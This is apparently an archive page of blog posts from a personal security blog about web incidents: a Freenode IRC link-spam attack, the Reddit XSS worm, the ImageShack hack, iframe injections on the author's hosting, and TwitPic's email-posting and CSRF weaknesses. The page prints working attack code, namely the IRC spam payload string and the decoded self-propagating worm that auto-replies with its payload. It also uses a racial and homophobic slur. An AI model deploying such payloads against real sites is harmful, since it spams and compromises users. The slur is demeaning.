But this time I have been amazed, not because of a vulnerability, but because the attention Grooveshark gives to it’s users. A security warning for users that aren’t up to date with Adobe Flash, every time you enter the website… image here.

Bravo. It’s an example I would expect others to follow as well.

P.S. they have a great error page when the service is down.

You can read the whole story here (and come back afterwards).

TLDR: the channel (through some javascript code) got link spammed in huge numbers.

The code – which you can find in the article I’ve pointed earlier – basically has an iframe, a form with an input tag (pointing to the iframe) and a small javascript code to do the magic.

What I’ve liked in the code is the way it sends the connection and “payload” to the irc server; via the following (combined) string.

x.value = '\r\nUSER '+i+' 8 * :'+n+ // user
          '\r\nNICK '+n+ // nick
          '\r\nJOIN #redditdowntime\r\n'
          +new Array(99).join(
              'PRIVMSG #redditdowntime :http://bit.ly/lolreddit\r\n'
          )+'';

And I like especially the last part of the payload, of which my first impression was that is creating 99 new lines and lastly the actual message as a way to wait while the server responded correctly.

Soon afterwards (couple of seconds, I swear) I realized that this snippet of code generates 100 messages to send.

Nice trick, I’ll remember it next time I’ll have to do a string repeat.

And as in any situation where someone needs to be blamed, this time the blame fell upon the Freenode sysadmins; and it was said in such a lovely way.

IN MY HUMBLE OPINION, (THIS IS MY OPINION AND NOT FACT):

Freenode is run by morons who can’t read IRCD config files. It is that simple.

Instead of reading the docs, freenode is switching to another IRCD to solve this “problem”. Well the problem is between the chair and the keyboard of the freenode admins. The thing you posted should not work at all against a properly configured IRCD. Instead REAL ADMINS with the practical skills of READING COMPREHENSION read the DOCUMENTS that describe the CONFIGURATION OPTIONS. And then they turn on the one feature invented in the 90s that will stop this dead.

But no, freenode has historically been run by people who don’t seem to exhibit any understanding of an IRC server or sysadmining. They will convert the entire network on the 30th to a new IRC which allows to ban users who send HTTP header to an IRC Server. Instead of reading the docs and turning on a certain option WHICH I WILL NOT SHARE HERE BECAUSE FREENODE ADMINS ARE IDIOTS AND SHOULD READ THE BLOODY DOCS.

Also firewalling with a pattern match on POST would’ve solved these problems too. But freenode admins are not the brightest admins.

And all of this because a Reddit user once owned a Digg user…. I can’t find the picture!

The (decoded) code of the worm is the following:

// generate payload/attack vector
// having trouble understanding why this works

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";

// and what's with the 9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d ?

// "click" all reply links in page
o=document;
e=o.getElementsByTagName('a');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='reply')
        $(e[i]).click();

// fill with payload
o=document;
e=o.getElementsByTagName('textarea');
for(i=0;i<e.length;i++)
    e[i].value=z;

// submit
e=o.getElementsByTagName('button');
for(i=0;i<e.length;i++)
    if(e[i].innerHTML=='save'&&e[i].style.display!='none')
        $(e[i]).click();

In the meantime of writing the article I tried to look for the invalid filtering in the source code, but as touching for the first time the code had no sense of direction. If someone would be kind enough to enlighten me in which file the code resides I’d be more than happy.

If not, we’ll have an unsolved mystery :)

UPDATE: worm author has happily shared its way of evading the filter.

UPDATE 2: post about the bug on the reddit blog.

Even if this may have been worse for users who store their images there (myself included), there is more to it than meets the eye.

Like the attack on Astalavista, this one was also performed by the anti-sec group (groups, there could be more) and only makes me think there will be more attacks.

The message which was present on ImageShack’s website after the attack.

As you may have read their manifesto, hacking ImageShack does not conform to their goal…

How do we plan to achieve this? Through the full and unrelenting, unmerciful elimination of all supporters of full-disclosure and the security industry in its present form. If you own a security blog, an exploit publication website or you distribute any exploits…

Furthermore, they don’t see the irony of their actions. The more they are going to hack security unrelated websites (like ImageShack) the more are they going to spread FUD. And it’s needles to say that more FUD equals more work for the whitehats that they so much despise.


And they are good at spreading FUD! After the Astalavista hack OpenSSH exploit FUD spread online like plague.

The only way I would go about vulnerability disclosure would be trough responsible one… Mentioning that I would be responsible only if the given vulnerability could affect me; otherwise I wouldn’t really care… that’s just me.

Even with all that said, there is one common ground where I can relay with them, concerning PoC code that script kiddies copy-pasta for mass sploitation… PoC should be only left for innovative/new techniques and not for every *dangerous* exploit out there.

Like any online movement it has it’s pros and cons; some didn’t/don’t understand the: VX, Zeitgeist, Anonymous (it is a movement, sort of) or any other movement; so why understand the Anti-sec one, right?

At first, my last Hosting Service was hacked and malicious iframes were injected in the website.

Later on, one of my twitter accounts (I’ve got two accounts) was suspended because I had a link to my infected blog.

The current hosting service I use had a hardware failure and a part of my blogs content is gone, RIP.

Apache failed a series of times to work this last week. And I’ve noticed this happens due to cold reboots. Other webservers I tried did not seem to fail in that aspect, but weren’t able to register properly PHP $_SERVER variables, so CodeIgniter wouldn’t work on them.

Actually I could have made CI to work, but I want it to work OOTB (out of the box).

SFTP under Centos/CPanel doesn’t support officialy chroot (if you have set up a similar environment feedback is welcome) so I could browse the root directory of my current hosting service, and had access to more than 100 databases. Problem was fixed by disabling SFTP and now I’m stuck with FTPES, which doesn’t support transfer resume… talk about responsive disclosure.

Posting this, doing a database backup and looking forward for more fail until the end of the month.

p.s. It must be due to my low karma on reddit.

littleboy10@insanesecurity.info

So if you’re wondering, that was the reason why your feed filled with a bunch of Insane Security articles.

You’re not my friend!

At first, when I saw maliciously injected iframes in the my websites I thought it may have been a targeted attack. Some reasons why I supposed this was due to the reason that other websites found on the same IP weren’t affected, or at least that was the way it looked at first. This wouldn’t have been so weird because I (and my coworker) manage these websites, and he stores the passwords in the ftp clients he uses, having no antivirus (that had to be mentioned).

After more lurking on more websites that have been on the same IP address I’ve came across other infected ones… So my first theory was dismissed, along with the pleasure that I would had if blamed my college.

WordPress, is that you?

The second thing I suspected was some wordpress plugin, because almost all those that were infected had wordpress on them (even those that didn’t belong to us), so maybe there was some piece of PHP code in some pluggin that could have started the whole infection…

Downloaded a sample installation from the server and started greping it, first thing that poped up was that pluggable.php was also infected (forgot to mention, but the iframes where attached in index.php and index.html files)… but nothing else, so I came to my third and final scenario.

It’s your fault!

Given the above scenarios have been ravished my last tough was a server exploitation. So I submitted a ticked demanding some information giving this issue, which came with some poor response (and the reason I switched the hoster):

—

—

No hard feelings, I always accept suggestions, but we where not talking only about my account (I mentioned others where affected as well), so I requested a grep on the websites; maybe they could have found if it were a local attack… but I was disappointed again:

—

—

No, thank you, and kudos for the Chinese guy who did this… Later on I found out that mass injection compromised more than twenty-thousand web sites and suspect that my former hoster may have been also under that attack.

Before I would go further with that I should state that I appreciate very much both Firefox addons. Couldn’t imagine browsing without the two of them. And this is the reason why I’ve put up that question, because once accustomed to both of these addons you just can’t go back to old fashion browsing.

It’s one thing that some didn’t knew how to use NoScript or didn’t fully understand it’s potential, and gone to use YesScript instead, which just made me crack.

And while both sides were right, I think it all started due to a misinformation or lack of it thereof. In NoScript’s FAQ it was stated that version 1.9.2.4 white listed Giorgio Maones domains in AdBlockPlus.

Some people probably started to fork NoScript, but that for another time, when we will have something that could reach the same level of protection which NoScript brought.

Update: NoScript’s author reply on the matter.

Due to this direction that Twitter is adopting (involuntarily) dozens of web applications have sprung up; from url shortening services to web applications like: WeFollow, TwitterSheep, TwitterTag, TwitVid, YFrog, TwitPic and many more…

Anyway, we’re going to talk about TwitPic… Among some annoyances it comes with; like: using HTTP even if SSL certificate is available, requesting username/password instead of using OAuth; recently (or at least I noticed yesterday and the blog didn’t work for me now) it implemented a more than annoying feature.

What’s wrong?

If you are using TwitPic you may notice that on the upload page there is a notice after the upload form, and I quote (partially, because I don’t want my account to be spammed):

Did you know you can post photos from your phone?
Just send your photos to
dblackshell.1768@twitpic.com

You can use the Subject line of the email to send a message along with your photo

A series of issues arise from this point onwards:

1. TwitPic stores usernames and passwords somewhere in plain text for Basic Auth authentication and tweeting when contacted via email.

2. The email option cannot be deactivated. Once you’ve logged to TwitPic you’re already vulnerable in a smaller or larger percentage.

3. The generated email address is of the format twitter_username.xxxx@twitpic.com, where xxxx is in a numeric format.

And how is that wrong?

It depends. On a targeted attack someone wouldn’t mind putting some effort in it. There are enough free hosting services out there which give you email sending functionality (restricted by a daily number thou), so mass mailing would be an option. Or welcome…

CSRF!

The setting page is CSRFeable, so setting a desired PIN (the 4 number digit) by the attacker isn’t out of the question.

How could this be beneficial for an attacker?

If you’re asking this question, maybe you should do more research on how influential people may be helpful for someone with obscure intentions.

• Would you click on a link Obama would post?
• What if I would have posted that tweet (assuming he ever used TwitPic)?
• What if on the landing page would be a Adobe Reader (it’s in vogue) exploit, browser exploit or some gay nigga porn (just for the lulz)?

p.s. If you were logged into TwitPic at the moment you visited this page, feel free to share you twitter username :)

Which Programming Language are You?

Which OS are You?

Which Website are You?

Which File Extension are You?

Which Nigerian spammer are You?